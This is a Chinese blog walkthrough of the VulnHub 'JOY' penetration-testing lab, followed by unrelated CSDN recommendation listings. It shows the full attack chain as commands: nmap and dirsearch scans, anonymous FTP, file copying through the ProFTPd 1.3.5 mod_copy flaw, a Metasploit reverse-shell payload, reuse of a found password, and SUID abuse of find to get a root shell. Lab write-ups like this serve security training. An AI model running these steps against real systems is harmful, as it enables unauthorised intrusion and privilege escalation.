JOY 打靶渗透

最新推荐文章于 2024-10-14 00:06:00 发布
最新推荐文章于 2024-10-14 00:06:00 发布
阅读量682 收藏 4
点赞数 15
文章标签: 网络 linux web安全 网络安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/140935092
版权

一、信息收集

1、查看靶机的MAC地址:

2、扫描靶机的ip地址:

nmap 192.168.13.0/24

3、扫描靶机开放的端口:

nmap -p- -sC -sT -sV -A 192.168.13.155

4、访问靶机的80端口:

5、扫描目录:

dirsearch -u "http://192.168.13.155"

dirsearch -u "http://192.168.13.155/ossec/"


6、依次访问目录,只发现了两串数字,发现没有什么有用的信息:

7、在扫描端口时发现可以进行ftp匿名登录:

用户:Anonymous

8、经过查看发现,download目录是空的,upload目录里有二十来个文本文件:

9、查看之后发现只有一个名叫directory的文本文件可能有点用,可以看出来patrick目录下有很多文本文件:

经过查看筛选,只有version_control这个文件有点用

10、使用命令将version_control文件拷贝到upload目录中,然后下载查看:

telnet 192.168.13.155 21

site cpfr /home/patrick/version_control

site cpto /home/ftp/upload/version_control

get  version_control

发现了敏感信息:

ProFTPd: 1.3.5
/var/www/tryingharderisjoy

11、使用msf搜索漏洞:

msfconsole

search proftpd 1.3.5

12、利用漏洞反弹shell:

use 0

show options

set rhosts 192.168.13.155

set sitepath /var/www/tryingharderisjoy

set payload cmd/unix/reverse_python

Run

13、反弹成功,查看用户权限不高,获取一个交互式会话

python -c 'import pty;pty.spawn("/bin/bash")'

二、提权

1、查看用户是否有sudo权限,发现需要用户输入密码:

2、通过查看本地文件,发现patricksecretsofjoy文件中出现账号和密码:

用户patrick的密码:apollo098765

3、使用账号密码切换用户:

4、经过查看发现用户具有sudo权限:

5、执行test文件发现,这个文件可以以root身份赋予权限:

sudo /home/patrick/script/test

6、给find命令赋予suid权限,进行提权:

../../../../../../../../../../usr/bin/find

4777

7、执行find命令进行提权:

find . -exec /bin/sh \; -quit

搬砖小星
关注
思科的joy提取加密流量特征教程以及基本使用
11-25 1111
joy是思科开源的用于流量的抓取和分析,用于网络安全的检测.Joy 旨在用于安全研究、取证和(小规模)网络监控,以检测漏洞、威胁和其他未经授权或不需要的行为。研究人员、管理员、渗透测试人员和安全运营团队可以充分利用这些信息,以保护网络受到监控,在存在漏洞的情况下,通过改进防御态势使更广泛的社区受益。与任何网络监控工具一样,Joy 可能会被滥用;不要在您使用的任何网络上使用它不是所有者或管理员。
将PCAP转换为Json文件的神器:joy(安装篇)
热门推荐
herosunly的博客
06-27 1万+
joy是一个捕获数据包、分析网络流量数据、网络研究取证及安全监控的工具。能够解析pcap包,生成json文件,里面包含了多种网络流量特征,方便对其进行分析。目前最新版本为4.5.0。 文章目录 1. 安装难点 2. 搜索文件 3. 使用正则表达式批量替换文件 4. 安装...
matlab打靶法,打靶法(含Matlab程序).doc
weixin_42502363的博客
03-16 2004
9 -实用标准文案文档大全西京学数学软件实验任务书课程名称数学软件实验班级数0901学号0912020107姓名李亚强实验课题微分方程组边值问题数值算法(打靶法,有限差分法)实验目的熟悉微分方程组边值问题数值算法(打靶法,有限差分法)实验要求运用Matlab/C/C++/Java/Maple/Mathematica等其中一种语言完成实验内容微分方程组边值问题数值算法(打靶法,有限差分法)成绩教师动...
靶机渗透练习57-digitalworld.local:JOY
hirak0的博客
04-19 4188
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/ Description Does penetration testing spark joy? If it does, this machine is for you. This machine is full of services, full of fun, but how many ways are there to align the stars? Perhaps
matlab打靶法程序,打靶法(含Mtlab程序).doc
weixin_29496661的博客
03-21 1547
9 -西京学数学软件实验任务书课程名称数学软件实验班级数0901学号0912020107姓名李亚强实验课题微分方程组边值问题数值算法(打靶法,有限差分法)实验目的熟悉微分方程组边值问题数值算法(打靶法,有限差分法)实验要求运用Matlab/C/C++/Java/Maple/Mathematica等其中一种语言完成实验内容微分方程组边值问题数值算法(打靶法,有限差分法)成绩教师动方向控制减速的推力,...
ros joy安装
condom10010的博客
06-10 1268
(1)使用现有的joy ros驱动,通过安装二进制方式安装ROS驱动功能包:sudo apt-get install ros-melodic-joy*(2)安装完成之后,便可以测试 joy节点:运行roscore;运行rosrun joy joy_node。(3)此时ros话题中就会有/joy的话题。
Cisco joy的安装
rooo0t的博客
03-16 4647
在借鉴别人安装joy的教程中都出现了不同的错误,然后这个方法亲测有效,非常顺利
ComfyUI - 使用 Joy Caption 模型 描述和打标 图像数据集 (Image Caption)
Mystra
08-27 1853
Joy Caption 模型 (由 Fancy Feast 研发) 在 SigLIP 和 Llama3.1 的基础之上,使用 Adapter 模式,训练出更好的描述图像的模型,需要与 SigLIP 和 Llama3.1 混合使用,输入图像,输出一段语义丰富的图像描述。
Joy:监控加密的网络流量
GGGYL111的博客
04-27 1445
获取Joy git clone https://github.com/cisco/joy ./config make $ sudo apt-get install build-essential libssl-dev libpcap-dev libcurl4-openssl-dev $ sudo apt-get install python-dev python-numpy python-setuptools python-scipy $ sudo easy_install -U scikit-le
joy-con-webhid:通过WebHID API使用Nintendo Switch Joy-Cons
05-05
Joy-Con WebHID 用于驱动程序,支持所有按钮,模拟摇杆以及设备的陀螺仪和加速度计传感器。 演示版 查看驱动程序的。 另一个演示是 ,您可以在其中玩Chrome dino游戏 :T-Rex: 通过在口袋里与Joy-Con控制器一起跳跃...
jc_toolkit:Joy-Con 工具包
05-31
Joy-Con 工具包 此图供参考。 先决条件: Microsoft Visual C++ 2017 (x86) Redistributable (所有 Windows 版本) Microsoft .NET Framework 4.7.1 (适用于低于 Windows 10 的 Windows) 参考: 官方论坛和二...
joycon-toolweb:Joy-Con和Pro Controller颜色修改工具
05-11
Joy-Con工具(网络Joy-Con和Pro Controller颜色修改工具 免责声明 该软件会永久修改硬件。 这可能会导致诸如固件更新后无法正常工作等问题。 对于因使用此软件而引起的任何问题,我概不负责。 用法 通过蓝牙将...
silly-joy:Haskell中“ Joy”的解释器,使用可扩展效果
02-04
本文将深入探讨一个名为“silly-joy”的项目,它是一个在Haskell中实现的“Joy”解释器,利用了Haskell的可扩展效果(extensible effects)特性。首先,我们来理解一下这两个核心概念——Joy语言和可扩展效果。 Joy...
joy4:Golang音频视频库和流服务器
02-28
请使用joy5 INSTEAD 高性能写时复制Gop缓存 更好的AV数据包设计 欢乐4 Golang音频/视频库和流服务器 JOY4是用golang编写的功能强大的库,经过精心设计的界面使几行代码可以完成很多工作,例如在各种媒体格式之间...
[Linux网络编程]深入了解TCP通信API,看看底层做了啥(看了这篇文章,你也算是读了Linux源码的高手!)
最新发布
m0_75062065的博客
10-14 276
在学了Linux网络编程时,有几个问题一直困扰着我listen的第二个参数backlog到底是什么为什么网络套接字也是文件描述符为什么要bind(),他起了什么作用于是就决心梳理一下整套通信的过程,建立完整的通信框架,便有了这篇文章tips:以下内容均在Linux2.6内核讨论,不同内核的实现方式大致相同,但是某些细节略有不同!!
408 14——42题
2402_85676269的博客
10-11 1023
/ 链路信息节点结构体// 路由器ID// 路由器IP} LinkNode;// 网络信息节点结构体// 网络前缀// 子网掩码} NetNode;// 弧节点结构体int Flag;// 标志位:1表示Link信息,2表示Net信息union {// 链路信息// 网络信息// 链路的代价// 指向下一个弧节点的指针} ArcNode;// 表头节点结构体// 路由器ID// 指向弧节点的指针// 指向下一个表头节点的指针} HNode;LinkNode和。
WireShark过滤器
ngczx的博客
10-11 625
Wireshark的过滤器规则可以分为**捕获过滤器**和**显示过滤器**,这两种过滤器有不同的编写规则
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值